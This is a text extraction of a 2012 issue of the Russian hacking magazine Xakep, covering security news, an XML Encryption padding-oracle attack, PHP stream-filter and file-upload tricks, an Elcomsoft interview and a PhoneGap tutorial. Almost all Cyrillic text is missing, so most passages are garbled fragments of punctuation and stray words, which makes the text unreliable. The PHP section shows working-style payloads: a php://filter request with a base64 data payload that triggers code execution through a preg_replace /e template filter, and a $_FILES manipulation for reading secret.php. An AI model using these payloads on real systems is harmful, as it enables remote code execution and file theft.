x 01 (156) 2012
WWW.XAKEP.RU
Lotus Domino Controller
ANDROID
: 230 .
XML
ENCRYPTION
XML-
.
,
024
PHP
036
PHONEGAP:
HTML5
064
018
156
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU
Intro
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
PC_ZONE UNITS
MALWARE SYN/ACK
UNIXOID
PR-
xakep.ru
step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(po@kumekay.com)
(grigorieva@glc.ru)
(xa@real.xakep.ru)
DVD
Unix-
Security-
ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)
ART
-
(alik@glc.ru)
: . : .
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906
:
, . , :
100%. ,
250 ,
. ? , , :
,
. .
. :
1-3 ,
. ,
: ,
. ,
.
, ,
, .
, .
, : .
,
, , .
:
115 !
shop.glc.ru/xakep.
, ,
. :
!
nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag
01/156/ 2012
TECHNOLOGY
(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)
(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)
(korenfeld@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2012
001
Content
004
HEADER
004
011
MEGANEWS
hacker tweets
-
SIRI
016
017
8 Dropbox AdWords
Proof-of-concept
XSS- 100
COVERSTORY
030
,
Adobe
COVERSTORY
COVERSTORY
018
024
XML
Encryption
XML
PHP
112
122
PCZONE
036
042
046
PhoneGap: HTML5
Windows-
Windows-
Windows-?
UNIXOID
102
107
112
117
050
054
060
064
068
072
Easy-Hack
MD5
- SpyEye
Lotus,
Lotus Domino Controller
X-Tools
SYN/ACK
118
122
NAS
5- 6- NAS-
Silicon
Power SP060GBSSDV30S25
PHREAKING
MALWARE
080
084
Win32/Duqu: Stuxnet
: bootkit test
BitDefender, ESET NOD32, F-Secure, Outpost Security,
Rising
126
132
094
098
.NET-
.NET Framework
,
-
Loop
,
136
139
142
088
FERRUM
130
074
Linux
!
tcpdump
Android-
- Ubuntu 11.10
Oneiric Ocelot
144
FAQ UNITED
FAQ
8.5
WWW2
web-
2012
NY2k+12
MEGANEWS
SIRI
UBUNTU
SIRI
iPhone 4S
Applidium Siri,
iOS 5. ,
. ,
Siri
. -,
Android, Siri iPad.
Applidium: applidium.com/en/news/
cracking_siri.
:
iPhone 4S
,
Speex. Siri
iPhone 4S.
\,
. ,
,
, , .
. iPhone
Apple. ,
.
Applidium
,
Siri.
,
,
Siri.
WINDOWS XP
.
,
.
APPLE
. ,
,
.
! comScore,
50,81
.
UBUNTU
(
Canonical, Debian,
,
Ubuntu) , Ubuntu
, .
Canonical ,
, Windows 8, , ARM-.
, . ,
. ,
Ubuntu 14.04, 2014 . ,
,
.
Canonical
Ubuntu 12.04,
2012 . , LTS-
( ),
,
.
(CHRONOPAY)
,
DDOS- (Assist),
.
, STEAM .
, ,
Steam.
POLAROID !
DNS
,
, DNS-.
, ,
.
DNS-
Hotmail, Gmail, Google, Microsoft
, Uol, Terra Globo. , , , google.com,
IP- Google,
-. . ,
Google
Google Defender, .
, ,
27- ,
DNS-
, DNS-.
, ,
Ghost Click.
- ,
DNS Changer. Mac OS
X Windows DNS.
IP- 15
! , , .
100 , 500
.
( ), 14 ,
. - ( - )
,
.
, , DNS-
Internet Systems Consortium.
,
Rove Digital. , .
, .
,
, .
EstDomains , , .
ICANN
2008, ,
.
. 22
.
85 .
2008
Polaroid ,
11-
.
,
Polaroid
, 11-
.
Polaroid
: Z340
Instant Digital Camera. ZINK
Zero Ink Printing,
. ,
, .
,
. , ,
,
. 14 .
2,7"
SD.
( 43 ) F/3,2.
( 1280 720 ). Polaroid Z340
76 102 , $20 30
. - ,
, , 25 .
, Polaroid. Z340 Instant Digital Camera $300.
AVIRA
AESCRIPT.DLL
!
, WI-FI,
MYBB
MyBB.
,
MyBB 1.6.4.
. ,
PHP, .
,
,
.
, ,
,
.
, CMS,
, .
, MyBB 1.6.4,
6 ,
. ,
.
.
,
.
(CDN).
, , ,
. , ,
. -, ,
10 ,
/GPS. ,
, , , , 802.11.
-,
. , ,
,
( 100 ), 802.11, .
, .
, ,
.
, - ,
.
. , - ,
.
iPhone 4S,
,
,
.
Apple
- :).
,
GOOGLE! , Microsoft.
Bing
Firefox.
38
Interfilm.ru
Puzkarapuz.ru.
13 .
,
.
YouTube :
Anonymous
(Zetas)
. , ,
, ,
. , 26 2011
- . ,
- .
-.
Anonymous ,
,
. ,
,
, -
, ,
. , OpCartel (
). , , ,
,
. , ,
,
OpCartel .
.
.
, , , , .
.
.onion Hidden Wiki,
. ,
. -
,
Freedom Hosting. ...
: Freedom Hosting,
40 ,
Anonymous . ,
,
- 20006000
.
38
.
IT .
,
(@asintsov)
#hacker tweets
@EdiStrosar:
,
(
).
@ILLUMlNATI:
@RuCTFE:
,
.
#RuCTFE
0ldEur0pe RWTH, ,
.
t.co/lUlI94Ko.
:
@WeldPond:
@jkouns:
. Google-
.
Google,
OllyDbg IDA Pro
_noRE.exe .
:
@mikko:
IP-: http://49.2;
http://96.4; http://71.3;
http://96.99.
...
-. :)
, Google
Wi-Fi,
_nomap. :)
@insit0r:
0day BIND.
@Rogunix:
Microsoft/MSRC.
!
Google. ++.
DNS- BIND,
DoS 0day.
Shodan ,
Siemens Simatic.
t.co/L1QDb3cq.
:
. SCADA
. SCADA- .
EMET,
, , . !
@Stephenwest:
How to do a pentest:
1. Draw line with pen.
2. Check line.
3. If visible, pen works.
4. If no line, pen does not work.
:
- .
pentest?
1. (pen) .
2. .
3. , , .
4. , , .
@WeldPond:
@fjserna:
CTF .
@csoghoian:
Chrome silentlyInstall()
. , FBI .
t.co/5EhY8AUC.
@jduck1337:
: bash: ./:
.
@j00ru:
@mikko:
,
: .
#worstpassword
Windows (NT/2000/
XP/2003/Vista/2008/7/8).
: t.co/oBHiB76O.
:
, . ? :)
( 926 ), ,
.
MEGANEWS
Nitro,
,
.
.
Stuxnet, , - ,
, .
, ,
Symantec. ,
Nitro,
,
. 29 19 ,
(,
). ,
.
, .
( Poisonlvy).
, .
Symantec ,
. Nitro :
, .
.
,
.
SUP
.
,
.
GOOGLE,
Android,
18,7%,
Opera Mini,
13,1%.
,
!
. , , .
, ? ,
, . ,
.
VideoGhost,
.
,
, (
- 2 ). VideoGhost
,
USB-. USB- -, .
USB-,
VideoGhost.
VGA, DVI HDMI,
$200.
FACEBOOK.
Trusted Friends
.
XXX.
ICANN
.
BITCOIN
PC ANDROID'
,
BITCOIN
BitCoin
.
,
, . ,
Mt Gox, BitCoin,
, . , BitCoin
, ,
,
.
Intego,
,
DevilRobber, BitCoin.
.
,
, ,
, ,
BitCoin, ,
.
DevilRobber Mac OS X,
.
The Pirate Bay . ,
Graphic Converter Mac OS X.
,
. , DevilRobber
BitCoin-, .
Mac. DevilRobber ,
Safari Vidalia
Firefox, TOR.
, DevilRobber , ,
.
BitCoin
.
Microsoft , . ,
BitCoin.
: 1
2, , 50 , 1 .
, , .
,
, ,
BitCoin. - .
, .
, .
, .
, BitCoin, :
, ,
- .
FXI ,
The Cotton
Candy
$200,
2012 .
, Windows 8
.
, GOOGLE ?
SSID
_NOMAP,
GOOGLE
ADOBE
FLEX
FLASH
,
,
, !
, , .
, , , . iSpy 100%.
, ,
iPhone Android
(magnified keys). iSpy
, ,
- !
,
.
,
60 .
90 % . ,
. , ,
.
DSLR-
12 . iSpy magnified key -
.
Adobe Flash
750 ( 7
% )
.
dobe
Flash Player. Flash
, Adobe AIR
. Android PlayBook,
. Flash Player
HTML5.
, Flash. , ,
Apple, , - Flash Player iOS.
, Flash Player Apple iOS , . Adobe Flash
Apple.
,
Flex SDK. Flex 4.6 SDK, 29 , open source.
.
DARPA
Shredder Challenge
. , .
50 .
AMAZON
.
, 2012
.
GOOGLE
42 47
.
500 Wikimedia.
IPHONE
iPhone Dev-Team
iPhone 4S.
,
.
,
,
.
iPhone 4S ,
. Chronic Dev Team iPhone
. , , ,
iPhone,
AT&T, .
, , ,
, iPhone 4S, iPhone
: iPhone 4 iPhone 3GS, . ,
,
. , ,
. : SIM-
AT&T, ,
, . AT&T
( , ,
, ).
, youtu.be/gofpelTXI5U. :
AT&T (611)
;
;
SIM- AT&T T-Mobile;
, Wi-Fi (
,
);
,
iPhone ;
;
EDGE
E;
2030 ;
iPhone,
;
,
;
SIM-,
;
SIM- T-Mobile
.
. , iPhone T-Mobile,
.
MCAFEE:
75
Proof-of-Concept
XSS-
100
, PoC.
, SQL-,
, ,
. , , sqlmap, SQLi
. PoC ,
XSS- . .
Damn Small XSS Scanner (DSXS).
XSS
. Cross-site scripting (XSS)
, JS-.
.
XSS- .
- , ,
,
HTTP-.
.
,
XSS-.
XSS- .
,
-
.
HTML-
GET/POST-.
(
),
.
,
,
XSS-. ,
-
. ,
. ,
HTML- <script>..</script> (
),
JavaScript-. ,
,
HTML- <a href="...">,
> JS-, <script>...</script>.
DSXS
XSS
zero.webappsecurity.com
, XSS . ? Python,
10 DROPBOX
ADWORDS
10 2
Dropbox , , ][,
.
2 ,
50 ,
. $99,00 . ,
,
250 . ,
10 , ,
- . , , Dropbox,
MAC-. , ,
(, bit.ly/und69i). ,
, Dropbox - , , . ,
,
10 , Dropbox
. AdWords !
?
,
(bit.ly/rxNKyB).
,
Dropbox-.
, .
? , ,
. . ,
AdWords,
.
? . ,
! , Google, 1000 .
. . bit.
ly/rAEsg1 $75
AdWords, , . :) , e-mail (
- ), (
- about.me), .
e-mail. ( ).
.
( ):
1. .
2. (, Dropbox).
3. ,
(, , ,
, ).
3. : , 600
.
. ,
.
: dropbox, free online storage,
online backup free, online backup, online backup data, dropbox space.
, ,
Google. URL ,
Dropbox Referall Status (,
http://db.tt/UfxuF8m). , .
, , .
,
. ,
CPC (Cost-Per-Click). , .
, ,
. :)
? -,
Dropbox. -, .
-, AdWords, , , (
Google). . :) z
?
? , ,
Google AdWords (adwords.google.com).
.
( ,
, ),
250 Dropbox
COVERSTORY
XML
Encryption
XML-
BEAST Padding Oracle Attack
.NET Framework,
XML
Encryption,
XML-.
CBC
.
WWW
www.w3.org/TR/
xmlenc-core/
XML Encryption
W3C.
bit.ly/qMupEv
,
XML
Encryption.
XML ENCRYPTION
XML Encryption, W3C 2002
, XML
Framework ( .NET, Apache Axis2,
JBOSS . .).
- , Microsoft Red Hat.
XML Encryption ,
XML- , ,
XML-
. , .
, AES 3DES CBC. AES (
, CBC).
XML Encryption
,
( 16 , 128 )
. ,
, CBC.
.
(IV),
XOR,
.
,
:
// Encryption
C[0] = AES_ENC(k, IV xor M[0]);
C[i] = AES_ENC(k, C[i-1] xor M[i]);
// Decryption
M[0] = AES_DEC(k, C[0]) xor IV;
M[i] = AES_DEC(k, C[i]) xor C[i-1];
k , , , IV
().
CBC,
.
, , :
,
. ,
, 12
0x05. ( 16 ),
, 15
, 16- 0x10.
, XML Encryption.
CBC ( )
, BEAST Padding
Oracle Attack.
. .
CBC ,
,
XOR IV
MSK, (IV xor MSK, C[0]) M[0] xor MSK. ,
.
,
MSK,
,
. ,
.
,
, . XML Encryption
, .
, , , ASCII. ASCII .
, NULL ( ),
( B). , , B,
. ,
,
. ,
, 16 ,
true, M[0] = AES_DEC_
CBC(k, (IV, C[0])) NULL, false
.
, , .
:
1. IV1, (IV1, C[0]) .
nIV, (nIV, C[0]). true,
IV1 = nIV, false .
WS-SECURITY
WS-Security
SOAP,
-. WS-Security XML Encryption XML
Signature.
,
23 , , ,
.
2.
(, AES_DEC ,
). :
msk = 0
repeat
,
3. X[0] ,
M[0].
XOR X[0]
IV.
. .
:
Input:
C=(IV1, C[0]), j
Output:
j- X[j]
X = AES_DEC(k, C[0])
. j-
, ,
j-
. , ? : CBC.
(
):
AES_DEC_CBC(k, (IV2, C[0])) = IV2 xor AES_DEC(k, C[0]) =
IV2 xor X[0].
XML Encryption
XML Encryption
,
<EncryptionMethod>.
,
XML-.
, XML-, . ? :-)
XML Encryption XML- ( XML),
.
Type <EncryptedData>. Encrypted Element , XML-
. Encrypted Content ,
, , . . Encrypted Text Content,
Encrypted Content,
,
. , Type . ,
XML Framework .
. XML Encryption UTF-8,
,
.
UTF-8 , ,
(line feed)
(carriage return). ,
ASCII UTF-8.
, ASCII
128 ( 4). ,
,
.
AXIS2
-
-.
Apache Axis2 Framework,
Rampart WS-Security.
XML Encryption XML
Signature SOAP.
Axis2
Framework, (message flow). (message flow)
,
SOAP- ( ),
. SOAP-
, Message
Receiver, , ,
Service .
Axis2
: Transport, Security Dispatch. Security,
XML SIGNATURE
XML Signature W3C,
XML.
?
Provable Security,
. ,
,
,
. . ,
(, , -,
, .).
-,
,
, . Axis2,
, -.
Padding Oracle Attack,
(-, ASP.NET),
.net.
, .
,
XML SOAP-.
Dispatch. Message
Receiver, message flow
SOAP ,
.
,
Axis2. :-)
AXIS2
-,
Axis2. ,
,
true false .
security fault. security fault
:
1.
. , ,
,
? ,
0x01 0x10,
.
2.
.
,
ASCII 0x00 0x1F ( 0x09,
0x0A, 0x0D , ).
XML- , &
(0x26) < >.
.
,
ASCII (
). A
XML & <,
B .
. ,
, , , CBC, 16-
, true
false. , SOAP, . ,
true, SOAP(AES_ENC_CBC(k, (IV, C)))
security fault, false .
, security fault,
, M XML-:
PAD(M) == (IV xor AES_DEC(k, C))
:
1. M, XML- <a>,
</a>.
2. M &,
escape-,
>.
3. M B.
security fault, ,
.
, , . .
C=(IV, C[1], ... , C[d]),
.
, CBC
[i] C[i-1].
,
ASCII ( UTF-8). ,
,
,
B ,
0x01 (
).
-
-
.
W3C web-service ,
machineto-machine-.
-
.
WSDL (Web Services Description Language), XML. -
,
RPC (Remote procedure calls,
), SOA (Service-oriented architecture,
) REST (Representational state transfer).
GET, POST, PUT, DELETE . .
HTTP, .
. (FindIV)
. = (IV, C[1], ... , C[d])
i,
C=(iv, C[i]).
, .
(FindXbyte) (
FindIV) j- X[i][j] X[i] = AES_DEC(k, C[i]). ,
.
Input: C=(C[0] = IV, C[1], ..., C[d])
Output: M=(M[1], ..., M[d])
for i = 1 to d do
iv = FindIV(C, i)
for j = 1 to 16
X[i][j] = FindXbyte(C[i], iv, j)
end for
X[i] = (X[i][1], ..., X[i][16])
M[i] = X[i] xor C[i-1]
end for
return (M[1], ..., M[d])
.
, M
CBC ( ,
). : FindIV FindXbyte.
FINDIV FINDXBYTE
FindIV , , ,
- . , .
, , ,
, , : <
IV,
0x01.
,
FindXbyte. , - , , ,
.
, , .
XML Encryption
ASCII
, .
( ,
)
( ). , , XML Schem
(XML-) . , ,
, , ,
. ,
,
.
( ),
.
,
,
XML Signature.
, XML Signature
Wrapping, , / MAC. ,
.
. -,
-, -,
.
-, , . ,
, ,
CBC, ,
(, ISO/IEC
19772:2009),
XML Encryption. , ,
OSI (, XML Encryption SSL/TLS,
BEAST).
,
, ,
, epic fail.
, XML Encryption
, side-channel,
. ,
, -
, .
Juraj Somorovsky Tibor Jager,
, . z
INFO
$_FILES
,
.
PHP
PHP
.
fopen, copy, file_get_
contents . .
,
,
.
WWW
bit.ly/sfDcys
LightningTemplate.
bit.ly/tTtvWV
LightningTemplate.
bit.ly/mdrdqf
,
File path
injection.
pastebin.com/1edSuSVN
File path
injection.
,
,
PHP 4.3
. PHP ( , . .) .
.
PHP ,
, .
,
:
print_r(stream_get_filters());
, . stream_filter_append/
bit.ly/g6ztD3
,
$_FILES.
DVD
.
phpBB3
stream_filter_prepend php://filter.
, ,
.
:
if($closing) {
$consumed += strlen($this->_data);
$str = nl2br($this->_data);
$this->bucket->data = $str;
$this->bucket->datalen = strlen($this->_data);
,
POST, Base64 :
readfile("php://filter/read=convert.base64-encode/resource=php://input");
, PHP
, . , ftp-,
gz-, :
copy('compress.zlib://ftp://user:pass@ftphost.com:21/path/file.dat.gz', '/local/copy/of/file.dat');
php://filter
-. ,
include ($_POST['inc']);
, PHP -
. !
, , ,
. -
. , nl2br. . ,
filter (
).
, .
$this->_data:
private $_data;
.........................
while($bucket = stream_bucket_make_writeable($in)) {
$this->_data .= $bucket->data;
$this->bucket = $bucket;
$consumed = 0;
}
, $closing
TRUE. :
Lightning Template
if(!empty($this->bucket->data))
stream_bucket_append($out, $this->bucket);
return PSFS_PASS_ON;
}
,
PSFS_PASS_ON. ,
. .
:
stream_filter_register('convert.nl2br_string',
'nl2br_filter');
, .
, , , .
Google Code Search.
stream_filter_register.
Lightning-Template (
), . ,
sample.html:
<html><head>
<meta charset="utf-8" />
<title>{{ title }}</title>
</head> </html>
include ("./LightningTemplate.php");
$lt = new LightningTemplate('./sample.html');
$lt->title = 'My Title';
echo $lt;
HTML-:
<html><head>
<meta charset="utf-8" />
<title>My Title</title>
</head></html>
,
HTML-. ,
include,
.
,
PHP-,
. ,
,
HTML-. :
public function filter($in, $out, &$consumed, $closing) {
while ($bucket = stream_bucket_make_writeable($in)) {
$patterns = array(
...
'/\{%\s+if\s+(.+?)\s+%\}/e',
...
);
$replacements = array(
...
"'<?php if ('. \$this->condition($1). '): ?>'",
...
);
$bucket->data = preg_replace($patterns,
$replacements, $bucket->data);
, "'<?php if,
. ,
. , ,
preg_replace
e. ,
:
{% if print_r(ini_get_all()) %}
PHP-. ,
, . , :
include ("./MYLightningTemplate.php");
$f = $_POST["file"];
readfile ($f);
, .
POST- file:
file=php://filter/read%3dconvert.lightning_template_filter/
resource%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
,
, , ,
-----------------2421143106617
php_user_filter.
: filter, onCreate, onClose.
filter, :
1. $in , ,
, .
2. $out , ,
.
3. $consumed , ,
, .
4. $closing , ,
TRUE, .
filter
:
1. PSFS_PASS_ON
.
2. PSFS_FEED_ME ,
$out .
3. PSFS_ERR_FATAL (default) .
onCreate/onClose ,
. (,
), onCreate,
. onCreate FALSE
TRUE . onClose
( ).
,
stream_filter_register.
. , ,
PHP.
FILE UPLOAD
move_uploaded_file, copy.
, , . .
, -. ,
, ,
.
,
HTML-, :
<form action=upload.php method=post
enctype=multipart/form-data>
<input type=file name=uploadfile>
<input type=submit value=Upload>
</form>
Upload, POST, Content-Type
:
Content-Type: multipart/form-data; boundary=
POST- :
-----------------------------2421143106617
Content-Disposition: form-data; name="uploadfile";
filename="hello.txt"
Content-Type: text/plain
,
hello.txt, <?php echo 'Hello!!!'; ?>.
PHP- ,
PHP
phpseUm44, hello.txt.
,
( PHP
).
$_FILES :
Array (
[uploadfile] => Array (
[name] => hello.txt
[type] => text/plain
[tmp_name] => /tmp/phpseUm44
[error] => 0
[size] => 33
)
)
, $_FILES[uploadfile][type]
Content-Type, .
, -,
PHP, :
$_FILES["file"]["type"] == "image/gif"
,
,
.
getimagesize(). , ,
, EXIF-
, .
,
. , -
pic.php.myext PHP-.
,
,
.
PHP, $_FILES.
, ,
.
bugs.php.net ,
, - .
:) ,
/ ,
$_FILES[uploadfile]
[name]. , , -. Unix-
-
. Windows- .
.
. $_FILES.
Qwazar rdot.org.
BlackFan, , ,
.
. , ,
copy:
$_FILES :
foreach ($_FILES["file"]["tmp_name"] as $key => $name)
{
echo "Size:".$_FILES["file"]["size"][$key]."<br/>\r\n";
echo "tmp name:".
$_FILES["file"]["tmp_name"][$key]."<br/>\r\n";
$_FILES["file"]["tmp_name"]["[name"]
copy :
$_FILES["file"]["tmp_name"][$key]
if($_FILES["file"]["size"][$key]>0 &&
$_FILES["file"]["size"][$key]<1024)
{
echo "Ok<br/>\r\n";
copy($_FILES["file"]["tmp_name"][$key],'test.txt');
}
}
, !
:
,
$_FILES ( ,
copy). , .
( upload.php), HTML-, secret.
php, , upload.php,
:
1. secret.php,
(, , <?php ?>).
2. , 1.
1.
,
:
$_FILES["file"]["size"][$key]>0
file[tmp_name][ secret.php,
1. ,
test.txt.
secret.php, txt,
, .
, ,
Content-Type (, ).
,
test.txt. !
,
move_uploaded_file copy.
. (, , , ) imagecreatefrom*/image*.
, , ,
. ,
$img = imagecreatefromjpeg($_FILES["filename"]["tmp_name"]);
imagejpeg($img, "uploads/".$_FILES["filename"]["name"]);
onCreate
JPEG,
EXIF- .
, -
. , ,
. ,
,
.
, imagecreatefrom* , , !
, ,
, . ,
base64_encode ,
, , :
$jpegimage = imagecreatefromjpeg(
"data://image/jpeg;base64," . base64_encode(
$sql_result_array['imagedata']));
imagejpeg($jpegimage);
,
, .
,
,
. , ,
.
, -,
, , copy,
imagecreatefrom*/image*, :
2009 PHP ,
.
, GPC-
(), . [ ( ).
PHP
. , HTML:
<form action=>
<input name="goodvar .[">
<input name="goodarray[foo]">
<input name="badvar[ . [">
<input type=submit>
</form>
index.php :
<?php
print_r($_GET);
?>
:
Array
(
    [goodvar___] =>
    [goodarray] => Array
        (
            [foo] =>
        )
    [badvar_____] =>
)
1.jpg c ,
, ,
POST- Content-Type:
php://filter/read%3dconvert.lightning_template_filter/
resource%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
Array
(
[goodvar___] =>
[goodarray] => Array
(
[foo] =>
)
[badvar_ . [] =>
)
, ! , ,
, imagecreatefromjpeg. ,
,
.
, .
$_FILES,
.
PHP
PHP.
, .
, - ,
, , . z
ADOBE
.
.
Elcomsof t.
vanced eBook Processor,
Ad
1
- 200 Defcon.
,
IT, , ?
(
. . . ][), , 6.
100 . . 20
.
. ,
- ... , ,
- ,
.
.
. ,
- , . ,
, - ...
,
.
, , .
4,5 ,
6 .
91- .
, , .
,
. , .
E
, ,
. , , , :
.
, ,
, .
,
, ,
, .
,
,
.
.
, .
, ,
( 97- )
. ,
,
,
IT. .
, ,
, 80 %.
Elcomsoft, .
, , ,
, . :
, .
.
,
... .
ELCOMSOFT
?
,
A .
password recovery, ,
. , ,
.
.
, .
, EFS
Recovery.
,
Active directory.
computer
forensics. ,
,
,
.
,
,
,
. ,
,
.
APPLE
,
,
? ADOBE
.
, ,
computer forensics.
, ,
. , ... Apple
,
. , ,
.
PDF
ELCOMSOFT ?
, pdf .
. : , ,
.
. ,
.
ADVANCED EBOOK
PROCESSOR, -
2001 DEFCON?
, . ,
,
pdf-, .
2001 .
,
,
. ,
, .
.
Defcon.
, ,
12 20 .
,
, ,
Adobe.
.
Defcon,
Advanced eBook Processor,
. ,
, ,
.
.
, Defcon 2001
, .
, .
.
, .
, . , ,
,
, .
.
, ,
ELCOMSOFT.
.
Access, . ,
... .
, ,
. -
,
. :)
, ,
.
-
, ,
. 90-
- ,
.
Elcomsoft, .
.
, .
, , , ...
A ,
Apple, iOS ( ,
iPhone 4S iPad2).
, .
, ,
? :)
. ,
.
, .
, , ,
,
, .
- .
,
? ?
.
,
,
21 .
,
.
,
. 11
-,
, .
,
.
, ,
, ... ,
. :) ,
, -.
,
. , ,
.
.
, ... , .
, ... ,
A
, .
Spot the fed ( ).
(, ),
,
, -
.
,
, ,
- , .
. ,
, , ,
, .
, .
Q
,
,
.
, ,
. ,
,
. ,
, , .
.
.
-.
. , ,
.
: ,
.
-, 11 . .
,
,
, ,
, , .
.
, , . :
, . ,
, .
,
ADOBE
?
, , -,
Adobe .
,
Adobe, . Adobe
, , . , : ,
, , . ,
.
, ,
?
, ,
Elcomsoft. ,
.
. .
, ,
.
.
, .
,
, , , ,
. ,
. ,
.
, ( -)
50
, Elcomsoft.
, ,
, .
, .
,
.
,
, . .
,
, -
, .
. ,
2001 ,
6 , 2002
. ,
( ),
:
, ,
,
.
deposition
( )
. ,
: -
?.
, :
.
, Elcomsoft
.
. 2001
,
.
, ,
2002.
?
Elcomsoft
A ,
Public
Interest Parole. ,
, 17
Elcomsoft
.
. ,
,
. .
Q
? ,
, ADOBE
- ?
.
DMCA.
, .
, -
,
.
, .
,
,
.
-
, ?
?
,
. .
.
,
.
?
, ...
. , .
, , -
,
.
, .
, ,
...
, , ,
. ,
,
,
.
9 .
CONFIDENCE 2.0
CANON.
?
,
(Canon).
, Canon 300D, ,
, Canon 350D.
, Canon
, ,
, , . Canon 30D,
.
, .
Canon. ,
Magic Lantern,
Canon
,
.
Canon Hackers Developers Kit,
,
.
,
Canon ,
,
.
CONFidence 2.0. Nikon
. (usb-)
.
, , . ,
. Nikon
.
510
,
,
?
,
, Practical
cryptography
. , ,
, . ... ,
, .
,
. , .
, , .
?
,
?
, .
,
.
,
.
,
.
, . ,
, , ,
.
,
1 % ,
. ,
. ,
, IT,
- : .
,
.
, ,
,
. z
Preview
30 .
.
68
,
:
.
.
.
,
Lotus Domino
Controller
.
, ,
IBM
.
PC ZONE
36
HTML5
Android iOS,
? .
30 .
74
500 ,
.
.
46
?
,
, .
64
?
.
,
.
MALWARE
80
DUQU
,
Stuxnet.
84
BOOTKIT!
, MBR, ,
5 .
PC ZONE
(http://twitter.com/azproduction)
PhoneGap:
HTML5
,
,
.
todo list Android
iOS, ,
.
Objective-C Java
,
, PhoneGap.
,
Windows 8, , , ,
HTML5. , , ,
, .
,
HTML, JavaScript
CSS!, PhoneGap.
: iOS, Android,
Windows Phone, Blackberry, WebOS, Symbian Bada.
(, Objective-C iOS), API
. , , HTML5
PhoneGap API.
HTML-, , ! API
,
: , , (
), , , ( ), . . ,
- .
jQuery Mobile Sencha,
,
( ).
,
, .
.
iOS
iOS -,
AppStore,
:). : , , , , Android. ,
,
, jQuery Mobile.
JS-
(
) . ,
,
! JQuery Mobile
(jquerymobile.com/download)
, :
images/ (
jq-mobile);
index.css;
index.html;
index.js;
jquery.js;
jquery.mobile.min.css;
jquery.mobile.min.js.
, .
index.html. , .
, . iOS .
.
,
, : , . AppStore
, , . ,
. ,
.
, ,
. : -, , PhoneGap iOS.
, .
JS- jQuery c jQuery Mobile (jquerymobile.com),
Google Maps v3.
: .
.
, ( ). ,
. API.
,
. , . localStorage.
<div data-role="page" data-dom-cache="true"
class="page-map" id="index">
<div data-role="header">
<h1></h1>
<a href="#points" class="ui-btn-right" id="menu-points"
data-transition="pop"></a>
</div>
<div data-role="content">
<div id="map-canvas">
<!-- -->
</div>
</div>
</div>
data-dom-cache="true" ,
.
data-transition="pop",
. ,
jQuery Mobile, (bit.ly/vtXX3M).
PHONEGAP
,
PhoneGap
. !
.
PhoneGap Build (build.phonegap.com) .
. ,
, .
-
PhoneGap,
. (github.com/
phonegap/phonegap-plugins),
iPhone, Android, Palm, BlackBerry. iOS
20 : BarcodeScanner ( -), AdPlugin ( iAd), NativeControls ( iOS
) .
:
<div data-role="page" data-dom-cache="true"
class="page-pints" id="points">
<div data-role="header">
<!-- -->
<a href="#" data-theme="b" data-icon="delete"
id="delete-all"> </a>
<h1></h1>
<!-- -->
<a href="#index" class="ui-btn-right"
data-transition="pop" data-direction="reverse">
</a>
</div>
<div>
<!-- -->
<ul id="list" data-role="listview"
data-inset="true" data-split-icon="delete">
</ul>
</div>
</div>
data-transition=pop,
data-direction=reverse,
.
. , .
,
API Google Maps, :
var latLng = new gm.LatLng(
    this.options.lat, this.options.lng);
this.map = new gm.Map(element, {
    zoom: this.options.zoom,            // initial zoom level
    center: latLng,                     // initial map center
    mapTypeId: gm.MapTypeId.ROADMAP,    // plain road map
    disableDoubleClickZoom: true,       // no zoom on double click/tap
    disableDefaultUI: true              // hide the default map controls
});
Gm , Google
Maps.
. :
this.person = new gm.Marker({
map: this.map,
icon: new gm.MarkerImage(PERSON_SPRITE_URL,
new gm.Size(48, 48))
});
PERSON_SPRITE_URL
Google-. maps.gstatic.
com/mapfiles/cb/mod_cb_scout/cb_scout_sprite_api_003.png. , , ,
, click:
gm.event.addListener(this.map, 'click', function (event) {
    self.requestMessage(function (err, message) {
        // Stop if requestMessage reported an error
        if (err) return;
        // Add a point at the clicked location with the entered message
        self.addPoint(event.latLng,
            self.options.radius, message);
        self.updatePointsList(); // refresh the list of points
    });
}, false);
ExternalHosts
.
. Geolocation API
(, ):
if (navigator.geolocation) {
    // Called with the device position when it is available
    function gpsSuccess(pos) {
        var lat, lng;
        if (pos.coords) {
            lat = pos.coords.latitude;
            lng = pos.coords.longitude;
        } else {
            lat = pos.latitude;
            lng = pos.longitude;
        }
        // Move the person marker to the new position
        self.movePerson(new gm.LatLng(lat, lng));
    }
    // Poll the current position every 3 seconds
    window.setInterval(function () {
        navigator.geolocation.getCurrentPosition(gpsSuccess,
            $.noop, {
                enableHighAccuracy: true,
                maximumAge: 300000
            });
    }, 3000);
}
movePerson
getPointsInBounds() ,
- .
? HTML5
localStorage, (
,
). , , , !
-
,
.
- Safari Chrome.
,
.
, , ,
WebKit.
- -
. , , Run
iPhone/iPad
PhoneGap.
, index.html , . ,
,
www. , Create folder
references for any added folders.
, . www.
PhoneGap.
phonegap-1.2.0.js . PhoneGap . . Supporting Files/PhoneGap.
plist, ExternalHosts ,
( Google
Maps): *.gstatic.com, *.googleapis.com, maps.google.com.
,
. - DOMReady jQuery:
$(document).ready(). PhoneGap deviceready,
, . :
iOS
. - ( Denwer
XAMPP), ,
.
, . ,
, PhoneGap, ,
, . ,
iOS-. ,
PhoneGap IDE
.
iOS,
Mac OS 10.6+ (
Mac OS 10.6), Xcode
iOS SDK. SDK,
